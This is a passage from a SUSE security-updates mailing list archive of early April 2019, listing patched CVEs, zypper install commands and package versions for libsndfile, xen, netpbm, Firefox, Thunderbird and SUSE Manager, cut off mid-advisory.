   An update that fixes three vulnerabilities is now available.

Description:

   This update for libsndfile fixes the following issues:

   Security issues fixed:

   - CVE-2017-17456: Prevent a segmentation fault in the function
     d2alaw_array() that may have led to a remote DoS (bsc#1071777).
   - CVE-2017-17457: Prevent a segmentation fault in the function
     d2ulaw_array() that may have led to a remote DoS, a different
     vulnerability than CVE-2017-14246 (bsc#1071767).
   - CVE-2018-19758: Fixed a heap-based buffer over-read at wav.c in
     wav_write_header that could have been used for a denial of service
     attack (bsc#1117954).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Software Development Kit 11-SP4:

      zypper in -t patch sdksp4-libsndfile-14008=1

   - SUSE Linux Enterprise Server 11-SP4:

      zypper in -t patch slessp4-libsndfile-14008=1

   - SUSE Linux Enterprise Debuginfo 11-SP4:

      zypper in -t patch dbgsp4-libsndfile-14008=1

Package List:

   - SUSE Linux Enterprise Software Development Kit 11-SP4 (i586 ia64 ppc64 s390x x86_64):

      libsndfile-devel-1.0.20-2.19.12.1

   - SUSE Linux Enterprise Server 11-SP4 (i586 ia64 ppc64 s390x x86_64):

      libsndfile-1.0.20-2.19.12.1

   - SUSE Linux Enterprise Server 11-SP4 (ppc64 s390x x86_64):

      libsndfile-32bit-1.0.20-2.19.12.1

   - SUSE Linux Enterprise Server 11-SP4 (ia64):

      libsndfile-x86-1.0.20-2.19.12.1

   - SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ia64 ppc64 s390x x86_64):

      libsndfile-debuginfo-1.0.20-2.19.12.1
      libsndfile-debugsource-1.0.20-2.19.12.1

   - SUSE Linux Enterprise Debuginfo 11-SP4 (ppc64 s390x x86_64):

      libsndfile-debuginfo-32bit-1.0.20-2.19.12.1

   - SUSE Linux Enterprise Debuginfo 11-SP4 (ia64):

      libsndfile-debuginfo-x86-1.0.20-2.19.12.1

References:

   https://www.suse.com/security/cve/CVE-2017-17456.html
   https://www.suse.com/security/cve/CVE-2017-17457.html
   https://www.suse.com/security/cve/CVE-2018-19758.html
   https://bugzilla.suse.com/1071767
   https://bugzilla.suse.com/1071777
   https://bugzilla.suse.com/1117954

From sle-security-updates at lists.suse.com Wed Apr 3 07:09:34 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Wed, 3 Apr 2019 15:09:34 +0200 (CEST)
Subject: SUSE-SU-2019:14011-1: important: Security update for xen
Message-ID: <20190403130934.2E564FEBC@maintenance.suse.de>

SUSE Security Update: Security update for xen
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:14011-1
Rating:             important
References:         #1110924 #1111007 #1111011 #1111014 #1112188 #1114423
                    #1114988 #1115040 #1115045 #1115047 #1117756 #1123157
                    #1126140 #1126141 #1126192 #1126195 #1126196 #1129623
Cross-References:   CVE-2018-10839 CVE-2018-17958 CVE-2018-17962
                    CVE-2018-17963 CVE-2018-18438 CVE-2018-18849
                    CVE-2018-19665 CVE-2018-19961 CVE-2018-19962
                    CVE-2018-19965 CVE-2018-19966 CVE-2018-19967
                    CVE-2019-6778 CVE-2019-9824
Affected Products:
                    SUSE Linux Enterprise Point of Sale 11-SP3
                    SUSE Linux Enterprise Debuginfo 11-SP3
______________________________________________________________________________

   An update that solves 14 vulnerabilities and has four fixes is now available.

Description:

   This update for xen fixes the following issues:

   Security issues fixed:

   - CVE-2018-19965: Fixed an issue with the INVPCID instruction when
     non-canonical addresses are accessed, which may allow a guest to crash
     Xen, resulting in a denial of service (DoS) affecting the entire host
     (XSA-279) (bsc#1115045)
   - CVE-2018-18849: Fixed an out-of-bounds memory access issue found in the
     LSI53C895A SCSI Host Bus Adapter emulation while writing a message in
     lsi_do_msgin (bsc#1114423).
   - CVE-2018-19665: Fixed an integer overflow resulting in memory corruption
     in various Bluetooth functions, which could crash the qemu process,
     resulting in a denial of service (DoS) (bsc#1117756).
   - CVE-2018-18438: Fixed an integer overflow in the ccid_card_vscard_read
     function which could allow memory corruption (bsc#1112188).
   - CVE-2018-17962: Fixed an integer overflow leading to a buffer overflow in
     the pcnet component (bsc#1111011)
   - CVE-2018-17963: Fixed an integer overflow in relation to large packet
     sizes, leading to a denial of service (DoS) (bsc#1111014)
   - Fixed an issue which could allow an untrusted PV domain with access to a
     physical device to DMA into its own pagetables, leading to privilege
     escalation (bsc#1126195).
   - Fixed an issue which could allow malicious or buggy x86 PV guest kernels
     to mount a denial of service attack affecting the whole system
     (bsc#1126196).
   - CVE-2018-17958: Fixed an integer overflow which could lead to a buffer
     overflow (bsc#1111007).
   - CVE-2018-10839: Fixed an integer overflow leading to a buffer overflow in
     the ne2000 component (bsc#1110924).
   - CVE-2019-6778: Fixed a heap buffer overflow in tcp_emu() found in slirp
     (bsc#1123157).
   - CVE-2018-19966: Fixed an issue introduced by XSA-240 that could have
     caused conflicts with shadow paging (XSA-280) (bsc#1115047).
   - CVE-2018-19967: Fixed HLE constructs that allowed guests to lock up the
     host, resulting in a denial of service (DoS) (XSA-282) (bsc#1114988).
   - Fixed multiple access violations introduced by the XENMEM_exchange
     hypercall which could allow a single PV guest to leak arbitrary amounts
     of memory, leading to a denial of service (bsc#1126192).
   - Fixed an issue which could allow malicious or buggy guests with passed
     through PCI devices to escalate their privileges, crash the host, or
     access data belonging to other guests. Additionally, memory leaks were
     also possible (bsc#1126140).
   - Fixed a race condition which could allow malicious PV guests to escalate
     their privilege to that of the hypervisor (bsc#1126141).
   - CVE-2019-9824: Fixed an information leak in the SLiRP networking
     implementation which could allow a user/process to read uninitialised
     stack memory contents (bsc#1129623).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Point of Sale 11-SP3:

  zypper in -t patch sleposp3-xen-14011=1

- SUSE Linux Enterprise Debuginfo 11-SP3:

  zypper in -t patch dbgsp3-xen-14011=1

Package List:

- SUSE Linux Enterprise Point of Sale 11-SP3 (i586):

  xen-kmp-default-4.2.5_21_3.0.101_0.47.106.59-45.30.1
  xen-kmp-pae-4.2.5_21_3.0.101_0.47.106.59-45.30.1
  xen-libs-4.2.5_21-45.30.1
  xen-tools-domU-4.2.5_21-45.30.1

- SUSE Linux Enterprise Debuginfo 11-SP3 (i586 x86_64):

  xen-debuginfo-4.2.5_21-45.30.1
  xen-debugsource-4.2.5_21-45.30.1

References:

https://www.suse.com/security/cve/CVE-2018-10839.html
https://www.suse.com/security/cve/CVE-2018-17958.html
https://www.suse.com/security/cve/CVE-2018-17962.html
https://www.suse.com/security/cve/CVE-2018-17963.html
https://www.suse.com/security/cve/CVE-2018-18438.html
https://www.suse.com/security/cve/CVE-2018-18849.html
https://www.suse.com/security/cve/CVE-2018-19665.html
https://www.suse.com/security/cve/CVE-2018-19961.html
https://www.suse.com/security/cve/CVE-2018-19962.html
https://www.suse.com/security/cve/CVE-2018-19965.html
https://www.suse.com/security/cve/CVE-2018-19966.html
https://www.suse.com/security/cve/CVE-2018-19967.html
https://www.suse.com/security/cve/CVE-2019-6778.html
https://www.suse.com/security/cve/CVE-2019-9824.html
https://bugzilla.suse.com/1110924
https://bugzilla.suse.com/1111007
https://bugzilla.suse.com/1111011
https://bugzilla.suse.com/1111014
https://bugzilla.suse.com/1112188
https://bugzilla.suse.com/1114423
https://bugzilla.suse.com/1114988
https://bugzilla.suse.com/1115040
https://bugzilla.suse.com/1115045
https://bugzilla.suse.com/1115047
https://bugzilla.suse.com/1117756
https://bugzilla.suse.com/1123157
https://bugzilla.suse.com/1126140
https://bugzilla.suse.com/1126141
https://bugzilla.suse.com/1126192
https://bugzilla.suse.com/1126195
https://bugzilla.suse.com/1126196
https://bugzilla.suse.com/1129623

From sle-security-updates at lists.suse.com  Wed Apr 3 07:12:49 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Wed, 3 Apr 2019 15:12:49 +0200 (CEST)
Subject: SUSE-SU-2019:0855-1: moderate: Security update for netpbm
Message-ID: <20190403131249.8D716FEBC@maintenance.suse.de>

SUSE Security Update: Security update for netpbm
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0855-1
Rating:             moderate
References:         #1086777
Cross-References:   CVE-2018-8975
Affected Products:
                    SUSE Linux Enterprise Module for Desktop Applications 15
                    SUSE Linux Enterprise Module for Basesystem 15
______________________________________________________________________________

An update that fixes one vulnerability is now available.

Description:

This update for netpbm fixes the following issues:

- CVE-2018-8975: The pm_mallocarray2 function allowed remote attackers to
  cause a denial of service (heap-based buffer over-read) via a crafted image
  file (bsc#1086777).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Module for Desktop Applications 15:

  zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-855=1

- SUSE Linux Enterprise Module for Basesystem 15:

  zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-855=1

Package List:

- SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64):

  libnetpbm-devel-10.80.1-3.3.36
  netpbm-debuginfo-10.80.1-3.3.36
  netpbm-debugsource-10.80.1-3.3.36

- SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64):

  libnetpbm11-10.80.1-3.3.36
  libnetpbm11-debuginfo-10.80.1-3.3.36
  netpbm-10.80.1-3.3.36
  netpbm-debuginfo-10.80.1-3.3.36
  netpbm-debugsource-10.80.1-3.3.36

References:

https://www.suse.com/security/cve/CVE-2018-8975.html
https://bugzilla.suse.com/1086777

From sle-security-updates at lists.suse.com  Wed Apr 3 07:13:31 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Wed, 3 Apr 2019 15:13:31 +0200 (CEST)
Subject: SUSE-SU-2019:0852-1: important: Security update for MozillaFirefox
Message-ID: <20190403131331.0917BFEBC@maintenance.suse.de>

SUSE Security Update: Security update for MozillaFirefox
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0852-1
Rating:             important
References:         #1125330 #1127987 #1129821 #1130262
Cross-References:   CVE-2018-18335 CVE-2018-18356 CVE-2018-18506 CVE-2019-5785
                    CVE-2019-9788 CVE-2019-9790 CVE-2019-9791 CVE-2019-9792
                    CVE-2019-9793 CVE-2019-9794 CVE-2019-9795 CVE-2019-9796
                    CVE-2019-9801 CVE-2019-9810 CVE-2019-9813
Affected Products:
                    SUSE OpenStack Cloud 7
                    SUSE Linux Enterprise Software Development Kit 12-SP4
                    SUSE Linux Enterprise Software Development Kit 12-SP3
                    SUSE Linux Enterprise Server for SAP 12-SP2
                    SUSE Linux Enterprise Server for SAP 12-SP1
                    SUSE Linux Enterprise Server 12-SP4
                    SUSE Linux Enterprise Server 12-SP3
                    SUSE Linux Enterprise Server 12-SP2-LTSS
                    SUSE Linux Enterprise Server 12-SP2-BCL
                    SUSE Linux Enterprise Server 12-SP1-LTSS
                    SUSE Linux Enterprise Server 12-LTSS
                    SUSE Linux Enterprise Desktop 12-SP4
                    SUSE Linux Enterprise Desktop 12-SP3
                    SUSE Enterprise Storage 4
______________________________________________________________________________

An update that fixes 15 vulnerabilities is now available.

Description:

This update for MozillaFirefox fixes the following issues:

Security issues addressed:

- Update to Firefox ESR 60.6.1 (bsc#1130262):
  - CVE-2019-9813: Fixed IonMonkey type confusion with __proto__ mutations
  - CVE-2019-9810: Fixed IonMonkey MArraySlice incorrect alias information
- Update to Firefox ESR 60.6 (bsc#1129821):
  - CVE-2018-18506: Fixed an issue with Proxy Auto-Configuration file
  - CVE-2019-9801: Fixed an issue which could allow Windows programs to be
    exposed to web content
  - CVE-2019-9788: Fixed multiple memory safety bugs
  - CVE-2019-9790: Fixed a use-after-free vulnerability when removing in-use
    DOM elements
  - CVE-2019-9791: Fixed incorrect type inference for constructors entered
    through on-stack replacement with IonMonkey
  - CVE-2019-9792: Fixed an issue where IonMonkey leaks the JS_OPTIMIZED_OUT
    magic value to script
  - CVE-2019-9793: Fixed multiple improper bounds checks when Spectre
    mitigations are disabled
  - CVE-2019-9794: Fixed an issue where command line arguments were not
    discarded during execution
  - CVE-2019-9795: Fixed a type-confusion vulnerability in the IonMonkey JIT
    compiler
  - CVE-2019-9796: Fixed a use-after-free vulnerability in the SMIL animation
    controller
- Update to Firefox ESR 60.5.1 (bsc#1125330):
  - CVE-2018-18356: Fixed a use-after-free vulnerability in the Skia library
    which can occur when creating a path, leading to a potentially
    exploitable crash.
  - CVE-2019-5785: Fixed an integer overflow vulnerability in the Skia
    library which can occur after specific transform operations, leading to
    a potentially exploitable crash.
  - CVE-2018-18335: Fixed a buffer overflow vulnerability in the Skia library
    which can occur with Canvas 2D acceleration on macOS. This issue was
    addressed by disabling Canvas 2D acceleration in Firefox ESR. Note: this
    does not affect other versions and platforms where Canvas 2D
    acceleration is already disabled by default.

Other issues addressed:

- Fixed an issue with MozillaFirefox-translations-common which was causing
  an error on update (bsc#1127987).

Release notes:
https://www.mozilla.org/en-US/security/advisories/mfsa2019-12/
https://www.mozilla.org/en-US/security/advisories/mfsa2019-08/
https://www.mozilla.org/en-US/security/advisories/mfsa2019-05/

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- SUSE OpenStack Cloud 7:

  zypper in -t patch SUSE-OpenStack-Cloud-7-2019-852=1

- SUSE Linux Enterprise Software Development Kit 12-SP4:

  zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-852=1

- SUSE Linux Enterprise Software Development Kit 12-SP3:

  zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-852=1

- SUSE Linux Enterprise Server for SAP 12-SP2:

  zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-852=1

- SUSE Linux Enterprise Server for SAP 12-SP1:

  zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-852=1

- SUSE Linux Enterprise Server 12-SP4:

  zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-852=1

- SUSE Linux Enterprise Server 12-SP3:

  zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-852=1

- SUSE Linux Enterprise Server 12-SP2-LTSS:

  zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-852=1

- SUSE Linux Enterprise Server 12-SP2-BCL:

  zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-852=1

- SUSE Linux Enterprise Server 12-SP1-LTSS:

  zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-852=1

- SUSE Linux Enterprise Server 12-LTSS:

  zypper in -t patch SUSE-SLE-SERVER-12-2019-852=1

- SUSE Linux Enterprise Desktop 12-SP4:

  zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-852=1

- SUSE Linux Enterprise Desktop 12-SP3:

  zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-852=1

- SUSE Enterprise Storage 4:

  zypper in -t patch SUSE-Storage-4-2019-852=1

Package List:

- SUSE OpenStack Cloud 7 (s390x x86_64):

  MozillaFirefox-60.6.1esr-109.63.2
  MozillaFirefox-debuginfo-60.6.1esr-109.63.2
  MozillaFirefox-debugsource-60.6.1esr-109.63.2
  MozillaFirefox-devel-60.6.1esr-109.63.2
  MozillaFirefox-translations-common-60.6.1esr-109.63.2

- SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64):

  MozillaFirefox-debuginfo-60.6.1esr-109.63.2
  MozillaFirefox-debugsource-60.6.1esr-109.63.2
  MozillaFirefox-devel-60.6.1esr-109.63.2

- SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64):

  MozillaFirefox-debuginfo-60.6.1esr-109.63.2
  MozillaFirefox-debugsource-60.6.1esr-109.63.2
  MozillaFirefox-devel-60.6.1esr-109.63.2

- SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64):

  MozillaFirefox-60.6.1esr-109.63.2
  MozillaFirefox-debuginfo-60.6.1esr-109.63.2
  MozillaFirefox-debugsource-60.6.1esr-109.63.2
  MozillaFirefox-devel-60.6.1esr-109.63.2
  MozillaFirefox-translations-common-60.6.1esr-109.63.2

- SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

  MozillaFirefox-60.6.1esr-109.63.2
  MozillaFirefox-debuginfo-60.6.1esr-109.63.2
  MozillaFirefox-debugsource-60.6.1esr-109.63.2
  MozillaFirefox-devel-60.6.1esr-109.63.2
  MozillaFirefox-translations-common-60.6.1esr-109.63.2

- SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64):

  MozillaFirefox-60.6.1esr-109.63.2
  MozillaFirefox-debuginfo-60.6.1esr-109.63.2
  MozillaFirefox-debugsource-60.6.1esr-109.63.2
  MozillaFirefox-translations-common-60.6.1esr-109.63.2

- SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64):

  MozillaFirefox-60.6.1esr-109.63.2
  MozillaFirefox-debuginfo-60.6.1esr-109.63.2
  MozillaFirefox-debugsource-60.6.1esr-109.63.2
  MozillaFirefox-translations-common-60.6.1esr-109.63.2

- SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64):

  MozillaFirefox-60.6.1esr-109.63.2
  MozillaFirefox-debuginfo-60.6.1esr-109.63.2
  MozillaFirefox-debugsource-60.6.1esr-109.63.2
  MozillaFirefox-devel-60.6.1esr-109.63.2
  MozillaFirefox-translations-common-60.6.1esr-109.63.2

- SUSE Linux Enterprise Server 12-SP2-BCL (x86_64):

  MozillaFirefox-60.6.1esr-109.63.2
  MozillaFirefox-debuginfo-60.6.1esr-109.63.2
  MozillaFirefox-debugsource-60.6.1esr-109.63.2
  MozillaFirefox-devel-60.6.1esr-109.63.2
  MozillaFirefox-translations-common-60.6.1esr-109.63.2

- SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64):

  MozillaFirefox-60.6.1esr-109.63.2
  MozillaFirefox-debuginfo-60.6.1esr-109.63.2
  MozillaFirefox-debugsource-60.6.1esr-109.63.2
  MozillaFirefox-devel-60.6.1esr-109.63.2
  MozillaFirefox-translations-common-60.6.1esr-109.63.2

- SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64):

  MozillaFirefox-60.6.1esr-109.63.2
  MozillaFirefox-debuginfo-60.6.1esr-109.63.2
  MozillaFirefox-debugsource-60.6.1esr-109.63.2
  MozillaFirefox-devel-60.6.1esr-109.63.2
  MozillaFirefox-translations-common-60.6.1esr-109.63.2

- SUSE Linux Enterprise Desktop 12-SP4 (x86_64):

  MozillaFirefox-60.6.1esr-109.63.2
  MozillaFirefox-debuginfo-60.6.1esr-109.63.2
  MozillaFirefox-debugsource-60.6.1esr-109.63.2
  MozillaFirefox-translations-common-60.6.1esr-109.63.2

- SUSE Linux Enterprise Desktop 12-SP3 (x86_64):

  MozillaFirefox-60.6.1esr-109.63.2
  MozillaFirefox-debuginfo-60.6.1esr-109.63.2
  MozillaFirefox-debugsource-60.6.1esr-109.63.2
  MozillaFirefox-translations-common-60.6.1esr-109.63.2

- SUSE Enterprise Storage 4 (x86_64):

  MozillaFirefox-60.6.1esr-109.63.2
  MozillaFirefox-debuginfo-60.6.1esr-109.63.2
  MozillaFirefox-debugsource-60.6.1esr-109.63.2
  MozillaFirefox-devel-60.6.1esr-109.63.2
  MozillaFirefox-translations-common-60.6.1esr-109.63.2

References:

https://www.suse.com/security/cve/CVE-2018-18335.html
https://www.suse.com/security/cve/CVE-2018-18356.html
https://www.suse.com/security/cve/CVE-2018-18506.html
https://www.suse.com/security/cve/CVE-2019-5785.html
https://www.suse.com/security/cve/CVE-2019-9788.html
https://www.suse.com/security/cve/CVE-2019-9790.html
https://www.suse.com/security/cve/CVE-2019-9791.html
https://www.suse.com/security/cve/CVE-2019-9792.html
https://www.suse.com/security/cve/CVE-2019-9793.html
https://www.suse.com/security/cve/CVE-2019-9794.html
https://www.suse.com/security/cve/CVE-2019-9795.html
https://www.suse.com/security/cve/CVE-2019-9796.html
https://www.suse.com/security/cve/CVE-2019-9801.html
https://www.suse.com/security/cve/CVE-2019-9810.html
https://www.suse.com/security/cve/CVE-2019-9813.html
https://bugzilla.suse.com/1125330
https://bugzilla.suse.com/1127987
https://bugzilla.suse.com/1129821
https://bugzilla.suse.com/1130262

From sle-security-updates at lists.suse.com  Wed Apr 3 07:14:37 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Wed, 3 Apr 2019 15:14:37 +0200 (CEST)
Subject: SUSE-SU-2019:0853-1: important: Security update for MozillaThunderbird
Message-ID: <20190403131437.C5D96FEBC@maintenance.suse.de>

SUSE Security Update: Security update for MozillaThunderbird
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0853-1
Rating:             important
References:         #1125330 #1129821 #1130262
Cross-References:   CVE-2018-18335 CVE-2018-18356 CVE-2018-18506 CVE-2018-18509
                    CVE-2019-5785 CVE-2019-9788 CVE-2019-9790 CVE-2019-9791
                    CVE-2019-9792 CVE-2019-9793 CVE-2019-9794 CVE-2019-9795
                    CVE-2019-9796 CVE-2019-9801 CVE-2019-9810 CVE-2019-9813
Affected Products:
                    SUSE Linux Enterprise Workstation Extension 15
______________________________________________________________________________

An update that fixes 16 vulnerabilities is now available.
Description:

This update for MozillaThunderbird to version 60.5.1 fixes the following
issues:

Security issues fixed:

- Update to MozillaThunderbird 60.6.1 (bsc#1130262):
  - CVE-2019-9813: Fixed IonMonkey type confusion with __proto__ mutations
  - CVE-2019-9810: Fixed IonMonkey MArraySlice incorrect alias information
- Update to MozillaThunderbird 60.6 (bsc#1129821):
  - CVE-2018-18506: Fixed an issue with Proxy Auto-Configuration file
  - CVE-2019-9801: Fixed an issue which could allow Windows programs to be
    exposed to web content
  - CVE-2019-9788: Fixed multiple memory safety bugs
  - CVE-2019-9790: Fixed a use-after-free vulnerability when removing in-use
    DOM elements
  - CVE-2019-9791: Fixed incorrect type inference for constructors entered
    through on-stack replacement with IonMonkey
  - CVE-2019-9792: Fixed an issue where IonMonkey leaks the JS_OPTIMIZED_OUT
    magic value to script
  - CVE-2019-9793: Fixed multiple improper bounds checks when Spectre
    mitigations are disabled
  - CVE-2019-9794: Fixed an issue where command line arguments were not
    discarded during execution
  - CVE-2019-9795: Fixed a type-confusion vulnerability in the IonMonkey JIT
    compiler
  - CVE-2019-9796: Fixed a use-after-free vulnerability in the SMIL animation
    controller
- Update to MozillaThunderbird 60.5.1 (bsc#1125330):
  - CVE-2018-18356: Fixed a use-after-free vulnerability in the Skia library
    which can occur when creating a path, leading to a potentially
    exploitable crash.
  - CVE-2019-5785: Fixed an integer overflow vulnerability in the Skia
    library which can occur after specific transform operations, leading to
    a potentially exploitable crash.
  - CVE-2018-18335: Fixed a buffer overflow vulnerability in the Skia library
    which can occur with Canvas 2D acceleration on macOS. This issue was
    addressed by disabling Canvas 2D acceleration in Firefox ESR. Note: this
    does not affect other versions and platforms where Canvas 2D
    acceleration is already disabled by default.
  - CVE-2018-18509: Fixed a flaw in the verification of certain S/MIME
    signatures that could mistakenly show emails as carrying a valid
    signature.

Release notes:
https://www.mozilla.org/en-US/security/advisories/mfsa2019-12/
https://www.mozilla.org/en-US/security/advisories/mfsa2019-11/
https://www.mozilla.org/en-US/security/advisories/mfsa2019-06/

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Workstation Extension 15:

  zypper in -t patch SUSE-SLE-Product-WE-15-2019-853=1

Package List:

- SUSE Linux Enterprise Workstation Extension 15 (x86_64):

  MozillaThunderbird-60.6.1-3.28.1
  MozillaThunderbird-debuginfo-60.6.1-3.28.1
  MozillaThunderbird-debugsource-60.6.1-3.28.1
  MozillaThunderbird-translations-common-60.6.1-3.28.1
  MozillaThunderbird-translations-other-60.6.1-3.28.1

References:

https://www.suse.com/security/cve/CVE-2018-18335.html
https://www.suse.com/security/cve/CVE-2018-18356.html
https://www.suse.com/security/cve/CVE-2018-18506.html
https://www.suse.com/security/cve/CVE-2018-18509.html
https://www.suse.com/security/cve/CVE-2019-5785.html
https://www.suse.com/security/cve/CVE-2019-9788.html
https://www.suse.com/security/cve/CVE-2019-9790.html
https://www.suse.com/security/cve/CVE-2019-9791.html
https://www.suse.com/security/cve/CVE-2019-9792.html
https://www.suse.com/security/cve/CVE-2019-9793.html
https://www.suse.com/security/cve/CVE-2019-9794.html
https://www.suse.com/security/cve/CVE-2019-9795.html
https://www.suse.com/security/cve/CVE-2019-9796.html
https://www.suse.com/security/cve/CVE-2019-9801.html
https://www.suse.com/security/cve/CVE-2019-9810.html
https://www.suse.com/security/cve/CVE-2019-9813.html
https://bugzilla.suse.com/1125330
https://bugzilla.suse.com/1129821
https://bugzilla.suse.com/1130262

From sle-security-updates at lists.suse.com  Wed Apr 3 16:09:39 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Thu, 4 Apr 2019 00:09:39 +0200 (CEST)
Subject: SUSE-SU-2019:0863-1: moderate: Security update for several packages related to SUSE Manager 3.1
Message-ID: <20190403220939.D07E8FF2D@maintenance.suse.de>

SUSE Security Update: Security update for several packages related to SUSE Manager 3.1
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0863-1
Rating:             moderate
References:         #1109316 #1111191 #1111910 #1114029 #1114059 #1114157
                    #1114169 #1117759 #1119081 #1119964 #1121038 #1121195
                    #1121856 #1122836 #1123991 #1124639 #1126862 #1128781
                    #1129765 #1130658
Cross-References:   CVE-2018-10851 CVE-2018-14626 CVE-2018-17197
Affected Products:
                    SUSE Manager Server 3.1
                    SUSE Manager Proxy 3.1
______________________________________________________________________________

An update that solves three vulnerabilities and has 17 fixes is now available.

Description:

This consolidated update includes multiple patchinfos for SUSE Manager Server
and Proxy and fixes the following security issues:

- CVE-2018-10851: Fixed denial of service via crafted zone record or crafted
  answer (bsc#1114157).
- CVE-2018-14626: Fixed packet cache pollution via crafted query
  (bsc#1114169).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

- SUSE Manager Server 3.1:

  zypper in -t patch SUSE-SUSE-Manager-Server-3.1-2019-863=1

- SUSE Manager Proxy 3.1:

  zypper in -t patch SUSE-SUSE-Manager-Proxy-3.1-2019-863=1

Package List:

- SUSE Manager Server 3.1 (ppc64le s390x x86_64):

  spacewalk-branding-2.7.2.17-2.31.3
  susemanager-3.1.19-2.34.2
  susemanager-tools-3.1.19-2.34.2

- SUSE Manager Server 3.1 (noarch):

  cobbler-2.6.6-5.25.1
  py26-compat-salt-2016.11.10-1.19.3
  spacecmd-2.7.8.15-2.32.1
  spacewalk-base-2.7.1.21-2.35.1
  spacewalk-base-minimal-2.7.1.21-2.35.1
  spacewalk-base-minimal-config-2.7.1.21-2.35.1
  spacewalk-html-2.7.1.21-2.35.1
  spacewalk-java-2.7.46.19-2.41.3
  spacewalk-java-config-2.7.46.19-2.41.3
  spacewalk-java-lib-2.7.46.19-2.41.3
  spacewalk-java-oracle-2.7.46.19-2.41.3
  spacewalk-java-postgresql-2.7.46.19-2.41.3
  spacewalk-taskomatic-2.7.46.19-2.41.3
  spacewalk-utils-2.7.10.11-2.23.3
  subscription-matcher-0.22-4.9.2
  susemanager-advanced-topics_en-pdf-3.1-10.29.4
  susemanager-best-practices_en-pdf-3.1-10.29.4
  susemanager-docs_en-3.1-10.29.4
  susemanager-frontend-libs-3.1.2-3.10.1
  susemanager-getting-started_en-pdf-3.1-10.29.4
  susemanager-jsp_en-3.1-10.29.4
  susemanager-reference_en-pdf-3.1-10.29.4
  susemanager-schema-3.1.21-2.36.1
  tika-core-1.20-1.6.2

- SUSE Manager Proxy 3.1 (noarch):

  spacewalk-base-minimal-2.7.1.21-2.35.1
  spacewalk-base-minimal-config-2.7.1.21-2.35.1

References:

https://www.suse.com/security/cve/CVE-2018-10851.html
https://www.suse.com/security/cve/CVE-2018-14626.html
https://www.suse.com/security/cve/CVE-2018-17197.html
https://bugzilla.suse.com/1109316
https://bugzilla.suse.com/1111191
https://bugzilla.suse.com/1111910
https://bugzilla.suse.com/1114029
https://bugzilla.suse.com/1114059
https://bugzilla.suse.com/1114157
https://bugzilla.suse.com/1114169
https://bugzilla.suse.com/1117759
https://bugzilla.suse.com/1119081
https://bugzilla.suse.com/1119964
https://bugzilla.suse.com/1121038
https://bugzilla.suse.com/1121195
https://bugzilla.suse.com/1121856
https://bugzilla.suse.com/1122836
https://bugzilla.suse.com/1123991
https://bugzilla.suse.com/1124639
https://bugzilla.suse.com/1126862
https://bugzilla.suse.com/1128781
https://bugzilla.suse.com/1129765
https://bugzilla.suse.com/1130658

From sle-security-updates at lists.suse.com  Wed Apr 3 16:13:45 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Thu, 4 Apr 2019 00:13:45 +0200 (CEST)
Subject: SUSE-SU-2019:0863-1: moderate: Security update for SUSE Manager Server 3.1
Message-ID: <20190403221345.5AAE8FF2D@maintenance.suse.de>

SUSE Security Update: Security update for SUSE Manager Server 3.1
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0863-1
Rating:             moderate
References:         #1109316 #1111191 #1111910 #1114029 #1114059 #1114157
                    #1114169 #1117759 #1119081 #1119964 #1121038 #1121195
                    #1121856 #1122836 #1123991 #1124639 #1126862 #1128781
                    #1129765 #1130658
Cross-References:   CVE-2018-10851 CVE-2018-14626 CVE-2018-17197
Affected Products:
                    SUSE Manager Server 3.1
                    SUSE Manager Proxy 3.1
